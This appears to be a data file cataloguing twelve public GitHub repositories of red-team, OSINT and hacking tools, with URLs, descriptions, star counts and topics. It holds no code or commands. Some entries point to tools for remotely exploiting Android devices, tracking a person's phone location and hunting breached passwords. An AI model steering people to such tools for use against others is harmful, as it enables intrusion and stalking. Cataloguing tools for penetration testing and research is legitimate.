- name: "RedTeam-Tools"
url: "https://github.com/A-poc/RedTeam-Tools"
description: "Tools and Techniques for Red Team / Penetration Testing."
stars: 7263
topics: ["red-team", "pentesting", "security-tools"]
- name: "Osint Stuff Tool Collection"
url: "https://github.com/cipher387/osint_stuff_tool_collection"
description: "A collection of several hundred online tools for OSINT."
stars: 6909
topics: ["osint", "hacking", "tools"]
- name: "reconFTW"
url: "https://github.com/six2dez/reconftw"
description: "Automated recon tool for identifying vulnerabilities."
stars: 6726
topics: ["recon", "hacking", "bug-bounty"]
- name: "HackTools"
url: "https://github.com/LasCC/HackTools"
description: "All-in-One browser extension for offensive security professionals."
stars: 6249
topics: ["hacking", "tools", "payloads"]
- name: "K8tools"
url: "https://github.com/k8gege/K8tools"
description: "Comprehensive hacking tools for various purposes."
stars: 6049
topics: ["hacking", "exploit", "pentest"]
- name: "mosint"
url: "https://github.com/alpkeskin/mosint"

description: "Automated e-mail OSINT tool."
stars: 5493
topics: ["osint", "email", "hacking"]
- name: "GhostTrack"
url: "https://github.com/HunxByts/GhostTrack"
description: "Tool to track location or mobile number."
stars: 5484
topics: ["osint", "hacking", "termux"]
- name: "PhoneSploit-Pro"
url: "https://github.com/AzeemIdrisi/PhoneSploit-Pro"
description: "Remotely exploit Android devices using ADB and Metasploit."
stars: 5335
topics: ["android", "hacking", "metasploit"]
- name: "game-hacking"
url: "https://github.com/dsasmblr/game-hacking"
description: "Tutorials, tools, and more related to reverse engineering video games."
stars: 5232
topics: ["game-hacking", "reverse-engineering", "cheat-engine"]
- name: "Ladon"
url: "https://github.com/k8gege/Ladon"
description: "Large-scale internal penetration scanner with various tools."
stars: 5167
topics: ["hacking", "scanner", "getshell"]
- name: "NetExec"
url: "https://github.com/Pennyw0rth/NetExec"
description: "The Network Execution Tool for red team operations."
stars: 4661
topics: ["hacking", "pentest", "networks"]
- name: "h8mail"
url: "https://github.com/khast3x/h8mail"
description: "Email OSINT & Password breach hunting tool."
stars: 4647
topics: ["osint", "hacking", "password"]